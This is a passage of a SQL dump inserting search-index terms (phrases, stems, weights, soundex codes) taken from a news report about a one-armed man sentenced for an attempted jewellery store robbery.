tear',0,1,1.4333,'G5236',1,'en'),(40298,'going to walk','go to walk',0,1,1.4333,'G52342',1,'en'),(40299,'gold chain','gold chain',0,1,1.3333,'G4325',1,'en'),(40300,'gold chain despite','gold chain despite',0,1,1.6,'G43253213',1,'en'),(40301,'gold chain good','gold chain good',0,1,1.5,'G432523',1,'en'),(40302,'good priced','good priced',0,1,1.3667,'G31623',1,'en'),(40303,'good priced 650.95','good priced 650.95',0,1,1.6,'G31623',1,'en'),(40304,'good young','good young',0,1,1.3333,'G352',1,'en'),(40305,'good young man','good young man',0,1,1.4667,'G3525',1,'en'),(40306,'got to','got to',0,1,1.2,'G300',1,'en'),(40307,'got to the','got to the',0,1,1.3333,'G300',1,'en'),(40308,'grabbed','grab',0,0,0.4667,'G613',1,'en'),(40309,'grabbed cromarty\'s','grab cromarty',0,1,1.6,'G613265632',1,'en'),(40310,'grabbed cromarty\'s left','grab cromarty left',0,1,1.7667,'G613265632413',1,'en'),(40311,'grabbed it','grab it',0,1,1.3333,'G613',1,'en'),(40312,'grabbed it and','grab it and',0,1,1.4667,'G61353',1,'en'),(40313,'grabbed onto','grab onto',0,1,1.4,'G61353',1,'en'),(40314,'grabbed onto his','grab onto his',0,1,1.5333,'G613532',1,'en'),(40315,'guy\',','gui',0,0,0.3333,'G000',1,'en'),(40316,'guy\', she','gui she',0,1,1.3,'G000',1,'en'),(40317,'guy\', she told','gui she told',0,1,1.4667,'G343',1,'en'),(40318,'had a hard','had a hard',0,1,1.3333,'H363',1,'en'),(40319,'had been highly','had been highly',0,1,1.5,'H31524',1,'en'),(40320,'hand cromarty','hand cromarty',0,1,1.4333,'H5326563',1,'en'),(40321,'hand cromarty squirmed','hand cromarty squirmed',0,1,1.7333,'H53265632653',1,'en'),(40322,'hard childhood','hard childhood',0,1,1.4667,'H63243',1,'en'),(40323,'hard childhood is','hard childhood is',0,1,1.5667,'H632432',1,'en'),(40324,'hard for','hard for',0,1,1.2667,'H6316',1,'en'),(40325,'hard for their','hard for their',0,1,1.4667,'H631636',1,'en'),(40326,'has been all','ha been all',0,1,1.4,'H2154',1,'en'),(40327,'has lived','ha lived',0,1,1.3,'H2413',1,'en'),(40328,'has lived with','ha lived with',0,1,1.4667,'H2413',1,'en'),(40329,'have a problem','have a problem',0,1,1.4667,'H16145',1,'en'),(40330,'have robbed','have robbed',0,1,1.3667,'H1613',1,'en'),(40331,'have robbed someone','have robbed someone',0,1,1.6333,'H161325',1,'en'),(40332,'he also','he also',0,1,1.2333,'H420',1,'en'),(40333,'he also ordered','he also ordered',0,1,1.5,'H426363',1,'en'),(40334,'he became','he became',0,1,1.3,'H125',1,'en'),(40335,'he became going','he became going',0,1,1.5,'H125252',1,'en'),(40336,'he got','he got',0,1,1.2,'H230',1,'en'),(40337,'he got to','he got to',0,1,1.3,'H230',1,'en'),(40338,'he said','he said',0,1,1.2333,'H230',3,'en'),(40339,'he said cromarty','he said cromarty',0,1,1.5333,'H2326563',1,'en'),(40340,'he squeezed','he squeezed',0,1,1.3667,'H230',1,'en'),(40341,'he squeezed free','he squeezed free',0,1,1.5333,'H2316',1,'en'),(40342,'he was shown','he was shown',0,1,1.4,'H250',1,'en'),(40343,'he was waiting','he was waiting',0,1,1.4667,'H2352',1,'en'),(40344,'hear about','hear about',0,1,1.3333,'H613',1,'en'),(40345,'hear about me','hear about me',0,1,1.4333,'H6135',1,'en'),(40346,'heavy drinking','heavi drinking',0,1,1.4667,'H1365252',1,'en'),(40347,'heavy drinking however','heavi drinking however',0,1,1.7333,'H136525216',1,'en'),(40348,'held on','held on',0,1,1.2333,'H435',1,'en'),(40349,'held on as','held on as',0,1,1.3333,'H4352',1,'en'),(40350,'her assistance','her assistance',0,1,1.4667,'H62352',1,'en'),(40351,'her assistance still','her assistance still',0,1,1.6667,'H6235234',1,'en'),(40352,'her peers','her peers',0,1,1.3,'H6162',1,'en'),(40353,'her peers liette','her peers liette',0,1,1.5333,'H616243',1,'en'),(40354,'hesitation','hesit',0,0,0.6667,'H235',1,'en'),(40355,'hesitation were','hesit were',0,1,1.5,'H2356',1,'en'),(40356,'hesitation were not','hesit were not',0,1,1.6333,'H235653',1,'en'),(40357,'high school','high school',0,1,1.3667,'H240',2,'en'),(40358,'high school diploma','high school diploma',0,1,1.6333,'H243145',1,'en'),(40359,'highly','highli',0,0,0.4,'H240',1,'en'),(40360,'highly preferred','highli preferred',0,1,1.5333,'H2416163',1,'en'),(40361,'highly preferred in','highli preferred in',0,1,1.6333,'H24161635',1,'en'),(40362,'him \'hey','him hey',0,1,1.2667,'H500',1,'en'),(40363,'him \'hey excuse','him hey excuse',0,1,1.5,'H520',1,'en'),(40364,'him by','him by',0,1,1.2,'H510',1,'en'),(40365,'him by the','him by the',0,1,1.3333,'H513',1,'en'),(40366,'him in','him in',0,1,1.2,'H500',1,'en'),(40367,'him in the','him in the',0,1,1.3333,'H530',1,'en'),(40368,'his 26','hi 26',0,1,1.2,'H200',1,'en'),(40369,'his 26 days','hi 26 days',0,1,1.3667,'H232',1,'en'),(40370,'his high','hi high',0,1,1.2667,'H200',1,'en'),(40371,'his high school','hi high school',0,1,1.5,'H240',1,'en'),(40372,'his legs','hi legs',0,1,1.2667,'H242',1,'en'),(40373,'his legs and','hi legs and',0,1,1.4,'H24253',1,'en'),(40374,'his legs figured','hi legs figured',0,1,1.5333,'H2421263',1,'en'),(40375,'his right','hi right',0,1,1.3,'H2623',1,'en'),(40376,'his right arm','hi right arm',0,1,1.4333,'H262365',1,'en'),(40377,'his shirt','hi shirt',0,1,1.3,'H263',1,'en'),(40378,'his shirt behind','hi shirt behind',0,1,1.5333,'H263153',1,'en'),(40379,'hold eventually','hold eventually',0,1,1.5,'H431534',1,'en'),(40380,'hold eventually two','hold eventually two',0,1,1.6333,'H4315343',1,'en'),(40381,'holding among','hold among',0,1,1.4333,'H435252',1,'en'),(40382,'holding among the','hold among the',0,1,1.5667,'H4352523',1,'en'),(40383,'however he','howev he',0,1,1.3333,'H160',1,'en'),(40384,'however he said','howev he said',0,1,1.5,'H1623',1,'en'),(40385,'humphrey','humphrei',0,0,0.5333,'H516',1,'en'),(40386,'humphrey gave','humphrei gave',0,1,1.4333,'H51621',1,'en'),(40387,'humphrey gave cromarty','humphrei gave cromarty',0,1,1.7333,'H5162126563',1,'en'),(40388,'humphrey issued','humphrei issued',0,1,1.5,'H51623',1,'en'),(40389,'humphrey issued had','humphrei issued had',0,1,1.6333,'H51623',1,'en'),(40390,'humphrey reminded','humphrei reminded',0,1,1.5667,'H51653',1,'en'),(40391,'humphrey reminded cromarty','humphrei reminded cromarty',0,1,1.8667,'H5165326563',1,'en'),(40392,'hurt','hurt',0,0,0.2667,'H630',1,'en'),(40393,'hurt you','hurt you',0,1,1.2667,'H630',1,'en'),(40394,'hurt you woman','hurt you woman',0,1,1.4667,'H635',1,'en'),(40395,'i could','i could',0,1,1.2333,'I243',1,'en'),(40396,'i could he','i could he',0,1,1.3333,'I243',1,'en'),(40397,'i going','i going',0,1,1.2333,'I252',1,'en'),(40398,'i going to','i going to',0,1,1.3333,'I2523',1,'en'),(40399,'i hurt','i hurt',0,1,1.2,'I630',1,'en'),(40400,'i hurt you','i hurt you',0,1,1.3333,'I630',1,'en'),(40401,'i realized','i realized',0,1,1.3333,'I6423',1,'en'),(40402,'i realized he','i realized he',0,1,1.4333,'I6423',1,'en'),(40403,'i selected','i selected',0,1,1.3333,'I2423',1,'en'),(40404,'i selected him','i selected him',0,1,1.4667,'I24235',1,'en'),(40405,'i think that','i think that',0,1,1.4,'I3523',1,'en'),(40406,'i was just','i was just',0,1,1.3333,'I230',1,'en'),(40407,'i was stealing','i was stealing',0,1,1.4667,'I23452',1,'en'),(40408,'i was surprised','i was surprised',0,1,1.5,'I261623',1,'en'),(40409,'i\'m sorry','i sorry',0,1,1.3,'I526',1,'en'),(40410,'i\'m sorry to','i sorry to',0,1,1.4,'I5263',1,'en'),(40411,'in a joint','in a joint',0,1,1.3333,'I5253',1,'en'),(40412,'in custody','in custody',0,1,1.3333,'I523',1,'en'),(40413,'in custody and','in custody and',0,1,1.4667,'I52353',1,'en'),(40414,'in jail','in jail',0,1,1.2333,'I524',1,'en'),(40415,'in jail want','in jail want',0,1,1.4,'I52453',1,'en'),(40416,'in sudbury','in sudbury',0,1,1.3333,'I52316',1,'en'),(40417,'in sudbury gets','in sudbury gets',0,1,1.5,'I52316232',1,'en'),(40418,'in the melee','in the melee',0,1,1.4,'I5354',1,'en'),(40419,'in the ontario','in the ontario',0,1,1.4667,'I53536',1,'en'),(40420,'in the wrong','in the wrong',0,1,1.4,'I53652',1,'en'),(40421,'in thinking','in thinking',0,1,1.3667,'I535252',1,'en'),(40422,'in thinking about','in thinking about',0,1,1.5667,'I53525213',1,'en'),(40423,'in trying','in trying',0,1,1.3,'I53652',1,'en'),(40424,'in trying to','in trying to',0,1,1.4,'I536523',1,'en'),(40425,'in your attempted','in your attempted',0,1,1.5667,'I563513',1,'en'),(40426,'inch','inch',0,0,0.2667,'I520',1,'en'),(40427,'inch 10','inch 10',0,1,1.2333,'I520',1,'en'),(40428,'inch 10 carat','inch 10 carat',0,1,1.4333,'I5263',1,'en'),(40429,'infiltration','infiltr',0,0,0.8,'I5143635',1,'en'),(40430,'infiltration as','infiltr as',0,1,1.5,'I51436352',1,'en'),(40431,'infiltration as opposed','infiltr as opposed',0,1,1.7667,'I51436352123',1,'en'),(40432,'injuries made','injuri made',0,1,1.4333,'I526253',1,'en'),(40433,'injuries made a','injuri made a',0,1,1.5,'I526253',1,'en'),(40434,'intend to assault','intend to assault',0,1,1.5667,'I5353243',1,'en'),(40435,'involved in your','involv in your',0,1,1.5333,'I5141356',1,'en'),(40436,'is a extremely','is a extremely',0,1,1.4667,'I23654',1,'en'),(40437,'is a very','is a very',0,1,1.3,'I216',1,'en'),(40438,'is just','is just',0,1,1.2333,'I230',1,'en'),(40439,'is just a','is just a',0,1,1.3,'I230',1,'en'),(40440,'is suffering','is suffering',0,1,1.4,'I21652',1,'en'),(40441,'is suffering alcohol','is suffering alcohol',0,1,1.6667,'I21652424',1,'en'),(40442,'is where you','is where you',0,1,1.4,'I260',1,'en'),(40443,'issued','issu',0,0,0.4,'I230',1,'en'),(40444,'issued had','issu had',0,1,1.3333,'I230',1,'en'),(40445,'issued had been','issu had been',0,1,1.5,'I2315',1,'en'),(40446,'issued in','issu in',0,1,1.3,'I235',1,'en'),(40447,'issued in thinking','issu in thinking',0,1,1.6,'I23535252',1,'en'),(40448,'it and experimented','it and experimented',0,1,1.6333,'I35321653',1,'en'),(40449,'it i was','it i was',0,1,1.2667,'I320',1,'en'),(40450,'it started','it started',0,1,1.3333,'I32363',1,'en'),(40451,'it started off','it started off',0,1,1.4667,'I323631',1,'en'),(40452,'jail','jail',0,0,0.2667,'J400',1,'en'),(40453,'jail a','jail a',0,1,1.2,'J400',1,'en'),(40454,'jail a one','jail a one',0,1,1.3333,'J450',1,'en'),(40455,'jail and','jail and',0,1,1.2667,'J453',1,'en'),(40456,'jail and a','jail and a',0,1,1.3333,'J453',1,'en'),(40457,'jail armed','jail armed',0,1,1.3333,'J4653',1,'en'),(40458,'jail armed thief','jail armed thief',0,1,1.5333,'J46531',1,'en'),(40459,'jail want','jail want',0,1,1.3,'J453',1,'en'),(40460,'jail want to','jail want to',0,1,1.4,'J453',1,'en'),(40461,'jewellers','jewel',0,0,0.6,'J462',1,'en'),(40462,'jewellers talked','jewel talked',0,1,1.5333,'J4623423',1,'en'),(40463,'jewellers talked to','jewel talked to',0,1,1.6333,'J4623423',1,'en'),(40464,'jewelry','jewelri',0,0,0.4667,'J460',3,'en'),(40465,'jewelry store','jewelri store',0,1,1.4333,'J46236',1,'en'),(40466,'jewelry store will','jewelri store will',0,1,1.6,'J462364',1,'en'),(40467,'joint','joint',0,0,0.3333,'J530',1,'en'),(40468,'joint submission','joint submission',0,1,1.5333,'J5321525',1,'en'),(40469,'joint submission by','joint submission by',0,1,1.6333,'J53215251',1,'en'),(40470,'just a few','just a few',0,1,1.3333,'J310',1,'en'),(40471,'just waiting','just waiting',0,1,1.4,'J352',1,'en'),(40472,'just waiting on','just waiting on',0,1,1.5,'J3525',1,'en'),(40473,'justice','justic',0,0,0.4667,'J320',1,'en'),(40474,'justice felt','justic felt',0,1,1.4,'J32143',1,'en'),(40475,'justice felt bad','justic felt bad',0,1,1.5333,'J3214313',1,'en'),(40476,'justice rich','justic rich',0,1,1.4,'J3262',1,'en'),(40477,'justice rich humphrey','justic rich humphrey',0,1,1.7,'J3262516',1,'en'),(40478,'kenrick','kenrick',0,0,0.4667,'K562',1,'en'),(40479,'kenrick abbott','kenrick abbott',0,1,1.4667,'K56213',1,'en'),(40480,'kenrick abbott called','kenrick abbott called',0,1,1.7,'K56213243',1,'en'),(40481,'knee','knee',0,0,0.2667,'K500',2,'en'),(40482,'knee defence','knee defence',0,1,1.4,'K53152',1,'en'),(40483,'knee defence lawyer','knee defence lawyer',0,1,1.6333,'K5315246',1,'en'),(40484,'ladies who','ladi who',0,1,1.3333,'L320',1,'en'),(40485,'ladies who were','ladi who were',0,1,1.5,'L326',1,'en'),(40486,'later the','later the',0,1,1.3,'L363',2,'en'),(40487,'later the chain','later the chain',0,1,1.5,'L36325',1,'en'),(40488,'lawyer','lawyer',0,0,0.4,'L600',1,'en'),(40489,'lawyer robert','lawyer robert',0,1,1.4333,'L6163',1,'en'),(40490,'lawyer robert beckett','lawyer robert beckett',0,1,1.7,'L6163123',1,'en'),(40491,'leave the','leav the',0,1,1.3,'L130',1,'en'),(40492,'leave the feminine','leav the feminine',0,1,1.6,'L1315',1,'en'),(40493,'left','left',0,0,0.2667,'L130',2,'en'),(40494,'left arm','left arm',0,1,1.2667,'L1365',1,'en'),(40495,'left arm and','left arm and',0,1,1.4,'L13653',1,'en'),(40496,'leg','leg',0,0,0.2,'L200',1,'en'),(40497,'leg injuries','leg injuries',0,1,1.4,'L25262',1,'en'),(40498,'leg injuries made','leg injuries made',0,1,1.5667,'L2526253',1,'en'),(40499,'legs','leg',0,0,0.2667,'L200',1,'en'),(40500,'legs and','leg and',0,1,1.2667,'L253',1,'en'),(40501,'legs and held','leg and held',0,1,1.4333,'L25343',1,'en'),(40502,'legs figured','leg figured',0,1,1.4,'L21263',1,'en'),(40503,'legs figured \'how','leg figured how',0,1,1.5667,'L21263',1,'en'),(40504,'liette','liett',0,0,0.4,'L300',1,'en'),(40505,'liette soloman','liett soloman',0,1,1.4667,'L3245',1,'en'),(40506,'liette soloman and','liett soloman and',0,1,1.6,'L32453',1,'en'),(40507,'linda','linda',0,0,0.3333,'L530',2,'en'),(40508,'linda blake','linda blake',0,1,1.3667,'L53142',1,'en'),(40509,'linda blake came','linda blake came',0,1,1.5333,'L531425',1,'en'),(40510,'lived','live',0,0,0.3333,'L130',2,'en'),(40511,'lived with','live with',0,1,1.3333,'L130',1,'en'),(40512,'lived with fibromyalgia','live with fibromyalgia',0,1,1.7667,'L1316542',1,'en'),(40513,'lost his','lost his',0,1,1.2667,'L232',1,'en'),(40514,'lost his right','lost his right',0,1,1.4667,'L232623',1,'en'),(40515,'lot at','lot at',0,1,1.2,'L300',1,'en'),(40516,'lot at age','lot at age',0,1,1.3333,'L320',1,'en'),(40517,'made a big','made a big',0,1,1.3333,'M312',1,'en'),(40518,'man and','man and',0,1,1.2333,'M300',1,'en'),(40519,'man and is','man and is',0,1,1.3333,'M320',1,'en'),(40520,'man who','man who',0,1,1.2333,'M000',1,'en'),(40521,'man who wriggled','man who wriggled',0,1,1.5333,'M6243',1,'en'),(40522,'man\'s','man',0,0,0.3333,'M200',1,'en'),(40523,'man\'s boldness','man boldness',0,1,1.4667,'M214352',1,'en'),(40524,'man\'s boldness and','man boldness and',0,1,1.6,'M21435253',1,'en'),(40525,'maryann','maryann',0,0,0.4667,'M650',1,'en'),(40526,'maryann rich','maryann rich',0,1,1.4,'M6562',1,'en'),(40527,'maryann rich a','maryann rich a',0,1,1.4667,'M6562',1,'en'),(40528,'may be thief','mai be thief',0,1,1.4,'M131',1,'en'),(40529,'me grabbed','me grabbed',0,1,1.3333,'M2613',1,'en'),(40530,'me grabbed onto','me grabbed onto',0,1,1.5,'M261353',1,'en'),(40531,'me off','me off',0,1,1.2,'M100',1,'en'),(40532,'me off pushing','me off pushing',0,1,1.4667,'M1252',1,'en'),(40533,'me you','me you',0,1,1.2,'M000',1,'en'),(40534,'me you are','me you are',0,1,1.3333,'M600',1,'en'),(40535,'melee','mele',0,0,0.3333,'M400',1,'en'),(40536,'melee about','mele about',0,1,1.3667,'M413',1,'en'),(40537,'melee about the','mele about the',0,1,1.5,'M413',1,'en'),(40538,'minor arm','minor arm',0,1,1.3,'M650',1,'en'),(40539,'minor arm and','minor arm and',0,1,1.4333,'M653',1,'en'),(40540,'month probation','month probation',0,1,1.5,'M316135',1,'en'),(40541,'month probation order','month probation order',0,1,1.7,'M316135636',1,'en'),(40542,'months','month',0,0,0.4,'M320',3,'en'),(40543,'months jail','month jail',0,1,1.3667,'M324',1,'en'),(40544,'months jail and','month jail and',0,1,1.5,'M32453',1,'en'),(40545,'much\'','much',0,0,0.3333,'M200',1,'en'),(40546,'much\' while','much while',0,1,1.3667,'M240',1,'en'),(40547,'much\' while holding','much while holding',0,1,1.6333,'M24352',1,'en'),(40548,'national dna','nation dna',0,1,1.4,'N35435',1,'en'),(40549,'national dna databank','nation dna databank',0,1,1.7,'N354353152',1,'en'),(40550,'need to start','need to start',0,1,1.4333,'N32363',1,'en'),(40551,'needed once','need once',0,1,1.3667,'N352',1,'en'),(40552,'needed once away','need once away',0,1,1.5333,'N352',1,'en'),(40553,'new 5','new 5',0,1,1.1667,'N000',1,'en'),(40554,'new 5 foot','new 5 foot',0,1,1.3333,'N130',1,'en'),(40555,'not earnestly','not earnestly',0,1,1.4333,'N365234',1,'en'),(40556,'not earnestly wounded','not earnestly wounded',0,1,1.7,'N36523453',1,'en'),(40557,'not going','not going',0,1,1.3,'N3252',1,'en'),(40558,'not going anywhere\'.said','not going anywhere',0,1,1.8,'N32525623',1,'en'),(40559,'not recoverable','not recoverable',0,1,1.5,'N3621614',1,'en'),(40560,'not recoverable maryann','not recoverable maryann',0,1,1.7667,'N3621614565',1,'en'),(40561,'not the','not the',0,1,1.2333,'N300',1,'en'),(40562,'not the beginer','not the beginer',0,1,1.5,'N31256',1,'en'),(40563,'of 23','of 23',0,1,1.1667,'O100',1,'en'),(40564,'of 23 described','of 23 described',0,1,1.5,'O132613',1,'en'),(40565,'of completing','of completing',0,1,1.4333,'O12514352',1,'en'),(40566,'of completing his','of completing his',0,1,1.5667,'O12514352',1,'en'),(40567,'of her peers','of her peers',0,1,1.4,'O16162',1,'en'),(40568,'of justice','of justice',0,1,1.3333,'O1232',1,'en'),(40569,'of justice felt','of justice felt',0,1,1.5,'O1232143',1,'en'),(40570,'of probation','of probation',0,1,1.4,'O16135',1,'en'),(40571,'of probation and','of probation and',0,1,1.5333,'O161353',1,'en'),(40572,'of probation pleaded','of probation pleaded',0,1,1.6667,'O16135143',1,'en'),(40573,'of robbery','of robbery',0,1,1.3333,'O1616',1,'en'),(40574,'of robbery and','of robbery and',0,1,1.4667,'O161653',1,'en'),(40575,'of the robbery','of the robbery',0,1,1.4667,'O13616',1,'en'),(40576,'off as','off as',0,1,1.2,'O120',1,'en'),(40577,'off as a','off as a',0,1,1.2667,'O120',1,'en'),(40578,'off pushing','off pushing',0,1,1.3667,'O1252',1,'en'),(40579,'off pushing through','off pushing through',0,1,1.6333,'O1252362',1,'en'),(40580,'offence','offenc',0,0,0.4667,'O152',1,'en'),(40581,'offence it','offenc it',0,1,1.3333,'O1523',1,'en'),(40582,'offence it started','offenc it started',0,1,1.6,'O15232363',1,'en'),(40583,'offended','offend',0,0,0.5333,'O153',1,'en'),(40584,'offended by','offend by',0,1,1.3667,'O1531',1,'en'),(40585,'offended by the','offend by the',0,1,1.5,'O15313',1,'en'),(40586,'old linda','old linda',0,1,1.3,'O43453',1,'en'),(40587,'old linda blake','old linda blake',0,1,1.5,'O43453142',1,'en'),(40588,'on an 18','on an 18',0,1,1.2667,'O500',1,'en'),(40589,'on as','on as',0,1,1.1667,'O520',1,'en'),(40590,'on as snugly','on as snugly',0,1,1.4,'O52524',1,'en'),(40591,'on hold','on hold',0,1,1.2333,'O543',1,'en'),(40592,'on hold eventually','on hold eventually',0,1,1.6,'O5431534',1,'en'),(40593,'on railway','on railway',0,1,1.3333,'O564',1,'en'),(40594,'on railway tracks','on railway tracks',0,1,1.5667,'O564362',1,'en'),(40595,'on the flip','on the flip',0,1,1.3667,'O53141',1,'en'),(40596,'once away','onc away',0,1,1.3,'O520',1,'en'),(40597,'once away from','onc away from',0,1,1.4667,'O52165',1,'en'),(40598,'one armed','on armed',0,1,1.3,'O5653',1,'en'),(40599,'one armed man','on armed man',0,1,1.4333,'O56535',1,'en'),(40600,'only used','onli used',0,1,1.3,'O5423',1,'en'),(40601,'only used force','onli used force',0,1,1.5,'O5423162',1,'en'),(40602,'ontario court','ontario court',0,1,1.4333,'O536263',1,'en'),(40603,'ontario court of','ontario court of',0,1,1.5333,'O5362631',1,'en'),(40604,'onto his','onto his',0,1,1.2667,'O532',1,'en'),(40605,'onto his legs','onto his legs',0,1,1.4333,'O53242',1,'en'),(40606,'opposed to robbery','oppos to robbery',0,1,1.6,'O123616',1,'en'),(40607,'order issued','order issued',0,1,1.4,'O63623',1,'en'),(40608,'order issued in','order issued in',0,1,1.5,'O636235',1,'en'),(40609,'ordered','order',0,0,0.4667,'O6363',2,'en'),(40610,'ordered cromarty','order cromarty',0,1,1.5333,'O636326563',1,'en'),(40611,'ordered cromarty use','order cromarty use',0,1,1.6667,'O6363265632',1,'en'),(40612,'other female','other female',0,1,1.4,'O36154',1,'en'),(40613,'other female employees','other female employees',0,1,1.7333,'O361545142',1,'en'),(40614,'other hand','other hand',0,1,1.3333,'O3653',1,'en'),(40615,'other hand cromarty','other hand cromarty',0,1,1.6333,'O365326563',1,'en'),(40616,'out a year','out a year',0,1,1.3333,'O360',1,'en'),(40617,'out with','out with',0,1,1.2667,'O300',1,'en'),(40618,'out with it','out with it',0,1,1.3667,'O300',1,'en'),(40619,'pandora bracelets in','pandora bracelets in',0,1,1.6667,'P5361624325',1,'en'),(40620,'pay out','pai out',0,1,1.2333,'P300',1,'en'),(40621,'pay out a','pai out a',0,1,1.3,'P300',1,'en'),(40622,'peers','peer',0,0,0.3333,'P620',1,'en'),(40623,'peers liette','peer liette',0,1,1.4,'P6243',1,'en'),(40624,'peers liette soloman','peer liette soloman',0,1,1.6667,'P6243245',1,'en'),(40625,'people who work','peopl who work',0,1,1.5,'P462',1,'en'),(40626,'pistols','pistol',0,0,0.4667,'P2342',1,'en'),(40627,'pistols ban','pistol ban',0,1,1.3667,'P234215',1,'en'),(40628,'pistols ban he','pistol ban he',0,1,1.4667,'P234215',1,'en'),(40629,'pleaded','plead',0,0,0.4667,'P430',1,'en'),(40630,'pleaded in','plead in',0,1,1.3333,'P435',1,'en'),(40631,'pleaded in the','plead in the',0,1,1.4667,'P4353',1,'en'),(40632,'pound','pound',0,0,0.3333,'P530',1,'en'),(40633,'pound rich','pound rich',0,1,1.3333,'P5362',1,'en'),(40634,'pound rich who','pound rich who',0,1,1.4667,'P5362',1,'en'),(40635,'preferred in','prefer in',0,1,1.4,'P61635',1,'en'),(40636,'preferred in a','prefer in a',0,1,1.4667,'P61635',1,'en'),(40637,'priced 650.95','price 650.95',0,1,1.4333,'P623',1,'en'),(40638,'priced 650.95 when','price 650.95 when',0,1,1.6,'P6235',1,'en'),(40639,'prisoner\'s','prison',0,0,0.6667,'P62562',1,'en'),(40640,'prisoner\'s box','prison box',0,1,1.4667,'P6256212',1,'en'),(40641,'prisoner\'s box saturday','prison box saturday',0,1,1.7667,'P6256212363',1,'en'),(40642,'probation','probat',0,0,0.6,'P6135',1,'en'),(40643,'probation and','probat and',0,1,1.4333,'P61353',1,'en'),(40644,'probation and to','probat and to',0,1,1.5333,'P61353',1,'en'),(40645,'probation order','probat order',0,1,1.5,'P6135636',1,'en'),(40646,'probation order issued','probat order issued',0,1,1.7333,'P613563623',1,'en'),(40647,'probation pleaded','probat pleaded',0,1,1.5667,'P6135143',1,'en'),(40648,'probation pleaded in','probat pleaded in',0,1,1.6667,'P61351435',1,'en'),(40649,'problem with','problem with',0,1,1.4,'P61453',1,'en'),(40650,'problem with drug','problem with drug',0,1,1.5667,'P6145362',1,'en'),(40651,'providing his','provid his',0,1,1.4333,'P61352',1,'en'),(40652,'providing his shirt','provid his shirt',0,1,1.6333,'P6135263',1,'en'),(40653,'pushing','push',0,0,0.4667,'P252',1,'en'),(40654,'pushing through','push through',0,1,1.5,'P252362',1,'en'),(40655,'pushing through doing','push through doing',0,1,1.7,'P252362352',1,'en'),(40656,'railway','railwai',0,0,0.4667,'R400',1,'en'),(40657,'railway tracks','railwai tracks',0,1,1.4667,'R4362',1,'en'),(40658,'railway tracks after','railwai tracks after',0,1,1.6667,'R4362136',1,'en'),(40659,'realized','realiz',0,0,0.5333,'R423',1,'en'),(40660,'realized he','realiz he',0,1,1.3667,'R423',1,'en'),(40661,'realized he became','realiz he became',0,1,1.6,'R423125',1,'en'),(40662,'receiving not','receiv not',0,1,1.4333,'R215253',1,'en'),(40663,'receiving not the','receiv not the',0,1,1.5667,'R215253',1,'en'),(40664,'recieve','reciev',0,0,0.4667,'R210',1,'en'),(40665,'recieve a','reciev a',0,1,1.3,'R210',1,'en'),(40666,'recieve a 24','reciev a 24',0,1,1.4,'R210',1,'en'),(40667,'recoverable','recover',0,0,0.7333,'R21614',1,'en'),(40668,'recoverable maryann','recover maryann',0,1,1.6333,'R21614565',1,'en'),(40669,'recoverable maryann rich','recover maryann rich',0,1,1.8,'R2161456562',1,'en'),(40670,'remembered','rememb',0,0,0.6667,'R5163',1,'en'),(40671,'remembered he','rememb he',0,1,1.4333,'R5163',1,'en'),(40672,'remembered he got','rememb he got',0,1,1.5667,'R516323',1,'en'),(40673,'reminded','remind',0,0,0.5333,'R530',1,'en'),(40674,'reminded cromarty','remind cromarty',0,1,1.5667,'R5326563',1,'en'),(40675,'reminded cromarty have','remind cromarty have',0,1,1.7333,'R53265631',1,'en'),(40676,'restrain','restrain',0,0,0.5333,'R2365',1,'en'),(40677,'restrain him','restrain him',0,1,1.4,'R2365',1,'en'),(40678,'restrain him in','restrain him in',0,1,1.5,'R2365',1,'en'),(40679,'rich','rich',0,0,0.2667,'R200',1,'en'),(40680,'rich a','rich a',0,1,1.2,'R200',1,'en'),(40681,'rich a shop','rich a shop',0,1,1.3667,'R210',1,'en'),(40682,'rich humphrey','rich humphrey',0,1,1.4333,'R2516',1,'en'),(40683,'rich humphrey gave','rich humphrey gave',0,1,1.6,'R251621',1,'en'),(40684,'rich who','rich who',0,1,1.2667,'R200',1,'en'),(40685,'rich who has','rich who has',0,1,1.4,'R200',1,'en'),(40686,'richard','richard',0,0,0.4667,'R263',2,'en'),(40687,'richard remembered','richard remembered',0,1,1.6,'R26365163',1,'en'),(40688,'richard remembered he','richard remembered he',0,1,1.7,'R26365163',1,'en'),(40689,'right arm','right arm',0,1,1.3,'R2365',1,'en'),(40690,'right arm while','right arm while',0,1,1.5,'R23654',1,'en'),(40691,'robbed','rob',0,0,0.4,'R130',1,'en'),(40692,'robbed someone','rob someone',0,1,1.4667,'R1325',1,'en'),(40693,'robbed someone humphrey','rob someone humphrey',0,1,1.7667,'R132516',1,'en'),(40694,'robbery','robberi',0,0,0.4667,'R160',1,'en'),(40695,'robbery and','robberi and',0,1,1.3667,'R1653',1,'en'),(40696,'robbery and breach','robberi and breach',0,1,1.6,'R1653162',1,'en'),(40697,'robbery attempt','robberi attempt',0,1,1.5,'R163513',1,'en'),(40698,'robbery attempt sentence','robberi attempt sentence',0,1,1.8,'R16351325352',1,'en'),(40699,'robbery cromarty','robberi cromarty',0,1,1.5333,'R1626563',1,'en'),(40700,'robbery cromarty was','robberi cromarty was',0,1,1.6667,'R16265632',1,'en'),(40701,'robbery justice','robberi justice',0,1,1.5,'R16232',1,'en'),(40702,'robbery justice rich','robberi justice rich',0,1,1.6667,'R1623262',1,'en'),(40703,'robbery very','robberi very',0,1,1.4,'R1616',1,'en'),(40704,'robbery very fortunate','robberi very fortunate',0,1,1.7333,'R161616353',1,'en'),(40705,'robert beckett','robert beckett',0,1,1.4667,'R163123',1,'en'),(40706,'robert beckett told','robert beckett told',0,1,1.6333,'R16312343',1,'en'),(40707,'robert brown','robert brown',0,1,1.4,'R163165',1,'en'),(40708,'robert brown jewellers','robert brown jewellers',0,1,1.7333,'R1631652462',1,'en'),(40709,'said \'thank','said thank',0,1,1.3667,'S352',1,'en'),(40710,'said \'thank you','said thank you',0,1,1.5,'S352',1,'en'),(40711,'said byron','said byron',0,1,1.3333,'S3165',1,'en'),(40712,'said byron cromarty','said byron cromarty',0,1,1.6333,'S316526563',1,'en'),(40713,'said cromarty','said cromarty',0,1,1.4333,'S326563',1,'en'),(40714,'said cromarty is','said cromarty is',0,1,1.5333,'S3265632',1,'en'),(40715,'said that','said that',0,1,1.3,'S300',1,'en'),(40716,'said that cromarty','said that cromarty',0,1,1.6,'S326563',1,'en'),(40717,'sample to','sampl to',0,1,1.3,'S5143',1,'en'),(40718,'sample to the','sampl to the',0,1,1.4333,'S5143',1,'en'),(40719,'saturday','saturdai',0,0,0.5333,'S363',1,'en'),(40720,'saturday in','saturdai in',0,1,1.3667,'S3635',1,'en'),(40721,'saturday in the','saturdai in the',0,1,1.5,'S36353',1,'en'),(40722,'say','sai',0,0,0.2,'S000',1,'en'),(40723,'say i\'m','sai 